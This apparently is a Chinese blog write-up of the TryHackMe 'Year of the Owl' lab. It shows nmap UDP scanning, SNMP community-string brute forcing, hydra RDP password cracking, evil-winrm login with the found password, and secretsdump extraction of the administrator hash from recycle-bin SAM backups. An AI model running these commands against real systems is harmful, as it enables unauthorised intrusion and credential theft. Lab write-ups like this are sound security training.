扫描打点
80
只有一个图,扫不到其他的
139
/445
呃,爆破不到,匿名也没有
呃,
3306
的mysql
和3389
的远程桌面都连不上啊嗯5985
的win-rm
就更不用说了*偷看wp
要扫
UDP
。。。这里需要注意只扫前 $10$ 端口,不然的话会好慢扫不出来:
1
nmap -sUV 10.10.141.39 --top-ports 10 -Pn
161/UDP:snmp
枚举snmp
是一个基于UDP
的对网络设备管理的服务使用
onesixtyone
进行枚举,这个工具也没自带,这个字典在attackbox
里面并没有自带,在这里可以找到1
onesixtyone 10.10.141.39 -c common-snmp-community-strings-onesixtyone.txt
![](https://pic.imgdb.cn/item/6752e140d0e0a243d4def4d6
发现一个叫
openview
的社区名:社区名:
SNMP
中的访问控制机制,类似于访问密码。它分为两种常见类型:Public
:用于只读访问,获取设备的基本信息Private
:用于读写访问,可修改设备配置
使用
snmp-check
工具枚举该社区名:1
snmp-check 10.10.88.208 -c openview
发现一个用户名
Jareth
这时候考虑前面找到的
rdp
和win-rm
,爆一下1
hydra -l jareth -P /usr/share/wordlists/rockyou.txt 10.10.141.39 -t 4 rdp
再用
evil-winrm
来连1
evil-winrm -i 10.10.88.208 -u jareth -p sarah
回收站找system备份提权
试图传
winpeas
的时候被拦下来了,应该是防火墙或者杀软?看
wp
在回收站发现了SAM
和SYSTEM
的备份但是
C:\$Recycle.Bin
提示不存在,要根据当前用户的SID
进入回收站:1
2whoami /user
cd 'C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001'再移出来再下载:
再用
secretdump
拿一下admin
信息1
python3 secretsdump.py -sam '/home/mikannse/桌面/sam.bak' -system '/home/mikannse/桌面/system.bak' LOCAL
拿到哈希
administrators:6bc99ede9edcfecf9662fb0c0ddcfa7a
THM打靶日寄39-Year of the Owl
- 本文链接: http://noone40404.github.io/2024/12/06/THM打靶日寄39:Year of the Owl/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!